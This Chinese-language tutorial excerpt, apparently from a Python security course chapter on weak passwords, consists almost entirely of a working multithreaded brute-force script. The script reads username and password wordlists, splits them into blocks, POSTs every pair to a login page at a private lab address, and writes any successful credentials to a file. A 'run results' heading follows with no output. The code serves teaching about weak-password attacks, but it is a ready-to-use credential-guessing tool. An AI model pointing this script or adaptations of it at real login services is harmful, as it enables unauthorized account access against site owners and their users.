python安全攻防第七章弱口令问题

多线程爆破脚本

#-*- encoding:utf-8 -*- import requests import threading import os #分块大小 BLOCK_SIZE = 1000 class ThreadWork: url = "http://192.168.0.109/WeakPassword/login.php" headers ={ "User-Agent": "Mozilla / 5.0(WindowsNT10.0;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0" } #类的构造函数 def __init__(self,username,password): self.username = username self.password = password def run(self,username,password): data = { 'username': username, 'password': password, 'submit': '%E7%99%BB%E5%BD%95' } print("username: {},password: {}".format(username, password)) response = requests.post(self.url, data=data, headers=self.headers) if 'Login failed!' in response.text: pass else: print("success!!! username: {}, password: {}".format(username, password)) resultFile = open('result', 'w') resultFile.write("success!!! username: {}, password: {}".format(username, password)) resultFile.close() #程序终止，0表示正常退出 os._exit(0) def start(self): for userItem in self.username: for pwdItem in self.password: self.run(userItem,pwdItem) def BruteForceHttp(): # 读取账号密码存入对应列表 listUsername = [line.strip() for line in open("username")] listPassword = [line.strip() for line in open("passwords")] #账号密码分块处理 blockUsername = partition(listUsername, BLOCK_SIZE) blockPassowrd = partition(listPassword, BLOCK_SIZE) threads = [] #把不同的密码子块分给不同的线程去爆破 for sonUserBlock in blockUsername: for sonPwdBlock in blockPassowrd: #传入账号子块和密码子块实例化任务 work = ThreadWork(sonUserBlock,sonPwdBlock) #创建线程 workThread = threading.Thread(target=work.start) #往threads中加入线程 threads.append(workThread) for t in threads: t.start() for t in threads: t.join() # 列表分块函数 def partition(ls, size): return [ls[i:i + size] for i in range(0, len(ls), size)] if __name__ == '__main__': BruteForceHttp()

运行结果